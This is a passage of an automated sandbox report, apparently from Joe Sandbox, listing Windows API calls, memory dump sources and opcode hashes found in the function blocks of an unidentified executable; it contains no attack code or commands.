          • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
          APIs
          • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
          • GetVolumeInformationW.KERNEL32 ref: 0045D5D2
          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorMode$InformationVolume
          • String ID: \VH
          • API String ID: 2507767853-234962358
          • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
          • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
          • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
          • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
          APIs
          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
          • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend
          • String ID: msctls_trackbar32
          • API String ID: 3850602802-1010561917
          • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
          • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
          • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
          • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
          APIs
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
          • CLSIDFromString.OLE32(?,00000000), ref: 00435236
          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
          • String ID: crts
          • API String ID: 943502515-3724388283
          • Opcode ID: 33da353606e74dfbf795dd1995dc1aeb3fd4e7d51c1727ec6b79e04b7ac8dfa1
          • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
          • Opcode Fuzzy Hash: 33da353606e74dfbf795dd1995dc1aeb3fd4e7d51c1727ec6b79e04b7ac8dfa1
          • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
          APIs
          • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
          • SetVolumeLabelW.KERNEL32 ref: 0045D331
          • SetErrorMode.KERNEL32(?), ref: 0045D35C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ErrorMode$LabelVolume
          • String ID: \VH
          • API String ID: 2006950084-234962358
          • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
          • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
          • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
          • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
          APIs
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
          • GetMenuItemInfoW.USER32 ref: 00449727
          • SetMenuItemInfoW.USER32 ref: 00449751
          • DrawMenuBar.USER32 ref: 00449761
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Menu$InfoItem$Draw_malloc
          • String ID: 0
          • API String ID: 772068139-4108050209
          • Opcode ID: 138bd1f2369a8ecedeaac2b5ded7d2b35a2b43dc04c7a35b8a64fd0af85f9e50
          • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
          • Opcode Fuzzy Hash: 138bd1f2369a8ecedeaac2b5ded7d2b35a2b43dc04c7a35b8a64fd0af85f9e50
          • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: _wcslen$_wcscpy
          • String ID: 3, 3, 8, 1
          • API String ID: 3469035223-357260408
          • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
          • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
          • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
          • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
          APIs
          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: ICMP.DLL$IcmpCloseHandle
          • API String ID: 2574300362-3530519716
          • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
          • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
          • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
          • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
          APIs
          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: ICMP.DLL$IcmpCreateFile
          • API String ID: 2574300362-275556492
          • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
          • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
          • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
          • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
          APIs
          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: ICMP.DLL$IcmpSendEcho
          • API String ID: 2574300362-58917771
          • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
          • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
          • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
          • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
          APIs
          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: RegDeleteKeyExW$advapi32.dll
          • API String ID: 2574300362-4033151799
          • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
          • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
          • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
          • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
          APIs
          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430DD3
          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00430DE5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: GetSystemWow64DirectoryW$kernel32.dll
          • API String ID: 2574300362-1816364905
          • Opcode ID: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
          • Instruction ID: 24515a708fc6b3a38513646dac5635f6d90a943ae1c03eade4216686bbe3791e
          • Opcode Fuzzy Hash: 14bf9b0efbe06d93ad9dae09c2ad7cadeb51a6503e8f45336d859f06d84a08d6
          • Instruction Fuzzy Hash: 51E0127154070A9BD7105FA5E91878A77D8DB14751F10882AFD45E2650D7B8E480C7BC
          APIs
          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00430E8D
          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00430E9F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: GetModuleHandleExW$kernel32.dll
          • API String ID: 2574300362-199464113
          • Opcode ID: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
          • Instruction ID: 757376e69a8637ab8385673bd519a3d20b1bca35ee4978b7889da1ae4d413b5b
          • Opcode Fuzzy Hash: 264f8e721adbed0a0a4958d5ac8267ac8e19a3b8732fd2a865be9a36fa944cb5
          • Instruction Fuzzy Hash: 4AE01271540706DFD7105F65D91964B77D8DF18762F104C2AFD85E2650D7B8E48087AC
          APIs
          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040EF6B
          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EF7D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: IsWow64Process$kernel32.dll
          • API String ID: 2574300362-3024904723
          • Opcode ID: e434190cfc746d225dda0a282e539c1801c395cd0759adf62cd2f230f9054cea
          • Instruction ID: 8a5e235981a70bd178cc672d1476e78975e513144aeeb8d5c54acf6a3c23c6fb
          • Opcode Fuzzy Hash: e434190cfc746d225dda0a282e539c1801c395cd0759adf62cd2f230f9054cea
          • Instruction Fuzzy Hash: DCD0C9B4A00B03EAD7301F72DA1870A76E4AB10781F204C3EBC81E5290DBBCC0808B28
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
          • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
          • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
          • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
          APIs
          • VariantInit.OLEAUT32(?), ref: 0047950F
          • SysAllocString.OLEAUT32(00000000), ref: 004795D8
          • VariantCopy.OLEAUT32(?,?), ref: 0047960F
          • VariantClear.OLEAUT32(?), ref: 00479650
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Variant$AllocClearCopyInitString
          • String ID:
          • API String ID: 2808897238-0
          • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
          • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
          • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
          • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
          APIs
          • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
          • __itow.LIBCMT ref: 004699CD
            • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
          • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
          • __itow.LIBCMT ref: 00469A97
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: MessageSend$__itow
          • String ID:
          • API String ID: 3379773720-0
          • Opcode ID: c3a956d33284f2c9f3f86cb058cc2767b53d45f45b0f3b019056d4494472ccb7
          • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
          • Opcode Fuzzy Hash: c3a956d33284f2c9f3f86cb058cc2767b53d45f45b0f3b019056d4494472ccb7
          • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
          APIs
          • GetWindowRect.USER32(?,?), ref: 00449A4A
          • ScreenToClient.USER32(?,?), ref: 00449A80
          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Window$ClientMoveRectScreen
          • String ID:
          • API String ID: 3880355969-0
          • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
          • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
          • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
          • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
